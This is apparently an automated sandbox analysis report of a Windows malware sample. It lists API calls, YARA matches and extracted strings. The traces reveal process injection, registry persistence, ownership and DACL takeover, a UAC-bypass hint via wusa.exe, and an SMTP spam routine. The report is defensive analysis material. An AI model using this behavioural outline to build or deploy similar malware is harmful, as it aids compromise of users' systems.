                                                                                        • Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D
                                                                                        APIs
                                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02D70929
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 560597551-0
                                                                                        • Opcode ID: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction ID: 46c7c7c6dcd93c711cbd188b681eb9ae36fa97d9339837816e323f92b9b16bc3
                                                                                        • Opcode Fuzzy Hash: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction Fuzzy Hash: 9F90043034437511DC3035DC0C01F4500133741734F7047307533DD1D0C54157004117
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0263219E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction ID: 5bb5f27c73bc6fd28f92f55c047a072dcb91be533e827f7c47be2bfb167a27e0
                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction Fuzzy Hash: 6C113F79A00208EFDB01DF98C985E98BBF5AF08350F058094FA489B361D371EE90DF84
                                                                                        APIs
                                                                                          • Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                        • Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEventSleep
                                                                                        • String ID:
                                                                                        • API String ID: 3100162736-0
                                                                                        • Opcode ID: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                        • Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
                                                                                        • Opcode Fuzzy Hash: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                        • Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 02D765F6
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D76610
                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 02D76631
                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D76652
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction ID: a87bc67cbf40450740ba22f79bcb3910fa16d4734e1bce9b3f2e034070a2c557
                                                                                        • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction Fuzzy Hash: 23113D71600258BFDB219F65DC46F9B3BACEB057A5F104064FA08A6251F7B5DD00CAB4
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32 ref: 02D79E6D
                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D79FE1
                                                                                        • lstrcat.KERNEL32(?,?), ref: 02D79FF2
                                                                                        • lstrcat.KERNEL32(?,0041070C), ref: 02D7A004
                                                                                        • GetFileAttributesExA.KERNEL32(?,?,?), ref: 02D7A054
                                                                                        • DeleteFileA.KERNEL32(?), ref: 02D7A09F
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 02D7A0D6
                                                                                        • lstrcpy.KERNEL32 ref: 02D7A12F
                                                                                        • lstrlen.KERNEL32(00000022), ref: 02D7A13C
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 02D79F13
                                                                                          • Part of subcall function 02D77029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 02D77081
                                                                                          • Part of subcall function 02D76F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02D77043), ref: 02D76F4E
                                                                                          • Part of subcall function 02D76F30: GetProcAddress.KERNEL32(00000000), ref: 02D76F55
                                                                                          • Part of subcall function 02D76F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02D76F7B
                                                                                          • Part of subcall function 02D76F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02D76F92
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 02D7A1A2
                                                                                        • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 02D7A1C5
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 02D7A214
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 02D7A21B
                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 02D7A265
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D7A29F
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 02D7A2C5
                                                                                        • lstrcat.KERNEL32(?,00000022), ref: 02D7A2D9
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 02D7A2F4
                                                                                        • wsprintfA.USER32 ref: 02D7A31D
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D7A345
                                                                                        • lstrcat.KERNEL32(?,?), ref: 02D7A364
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 02D7A387
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 02D7A398
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 02D7A1D1
                                                                                          • Part of subcall function 02D79966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 02D7999D
                                                                                          • Part of subcall function 02D79966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 02D799BD
                                                                                          • Part of subcall function 02D79966: RegCloseKey.ADVAPI32(?), ref: 02D799C6
                                                                                        • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 02D7A3DB
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 02D7A3E2
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 02D7A41D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                        • String ID: "$"$"$D$P$\
                                                                                        • API String ID: 1653845638-2605685093
                                                                                        • Opcode ID: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction ID: 238b270d6a0cce65ada9d1d891937111537e3d8dcf9f59bee40b8a805c363c66
                                                                                        • Opcode Fuzzy Hash: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction Fuzzy Hash: 5CF130B1D40259AFDF21DBA08C48FEF7BBDAB08304F5444A6E645E2241F7798A84CF65
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
                                                                                        • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
                                                                                        • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
                                                                                        • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
                                                                                        • GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
                                                                                        • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
                                                                                        • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                        • API String ID: 2238633743-3228201535
                                                                                        • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                        • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                        • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                        • wsprintfA.USER32 ref: 0040B3B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                        • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                        • API String ID: 766114626-2976066047
                                                                                        • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                        • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
                                                                                        • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                        • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                        • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D
                                                                                        • API String ID: 2976863881-3037353064
                                                                                        • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                        • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                        • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                        • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02D77D21
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02D77D46
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02D77D7D
                                                                                        • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02D77DA2
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02D77DC0
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02D77DD1
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02D77DE5
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02D77DF3
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02D77E03
                                                                                        • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02D77E12
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02D77E19
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02D77E35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D
                                                                                        • API String ID: 2976863881-3037353064
                                                                                        • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                        • Instruction ID: a331afe7b2069b489640250e47c1358173915573c22bfa6d00c6d43fba163a8c
                                                                                        • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                        • Instruction Fuzzy Hash: 3DA15171900219AFEF11CFA0DD48FEFBBB9FB08304F14856AE505E6250E7798A84DB64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                        • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                        • API String ID: 2400214276-165278494
                                                                                        • Opcode ID: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
                                                                                        • Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
                                                                                        • Opcode Fuzzy Hash: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
                                                                                        • Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 0040A7FB
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                        • wsprintfA.USER32 ref: 0040A8AF
                                                                                        • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                        • wsprintfA.USER32 ref: 0040A8E2
                                                                                        • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                        • wsprintfA.USER32 ref: 0040A9B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$send$lstrlenrecv
                                                                                        • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                        • API String ID: 3650048968-2394369944
                                                                                        • Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                        • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                        • Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                        • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                        • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                        • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02D77A96
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02D77ACD
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 02D77ADF
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02D77B01
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02D77B1F
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02D77B39
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02D77B4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02D77B58
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02D77B68
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02D77B77
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02D77B7E
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02D77B9A
                                                                                        • GetAce.ADVAPI32(?,?,?), ref: 02D77BCA
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02D77BF1
                                                                                        • DeleteAce.ADVAPI32(?,?), ref: 02D77C0A
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02D77C2C
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02D77CB1
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02D77CBF
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02D77CD0
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02D77CE0
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02D77CEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction ID: c73575f3dfa05ff2b505e62887fe13f019260b786f91143899529f9df2ea15ca
                                                                                        • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction Fuzzy Hash: 5C813F71900219AFEB11CFA4DD44FEEBBB8EF0C304F14856AE505E6250E7799A45CFA4
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                        • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                        • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                        • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$localcfg
                                                                                        • API String ID: 237177642-1954108138
                                                                                        • Opcode ID: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
                                                                                        • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                        • Opcode Fuzzy Hash: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
                                                                                        • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                        • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShelllstrlen
                                                                                        • String ID: $%systemroot%\system32\cmd.exe$<$@$D$PDGu$uac$useless$wusa.exe
                                                                                        • API String ID: 1628651668-3716895483
                                                                                        • Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                        • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                        • Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                        • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                        • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                          • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                        • API String ID: 4207808166-1381319158
                                                                                        • Opcode ID: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
                                                                                        • Instruction ID: 8f9aaa01d81d5e00f35a14cef107f65a3e8f5b831808d54868c05c9eb27f2f66
                                                                                        • Opcode Fuzzy Hash: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
                                                                                        • Instruction Fuzzy Hash: D451D9B05043446FD320AF768C85F67BAECEB84708F04493FF955A2292D7BDA94487A9
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
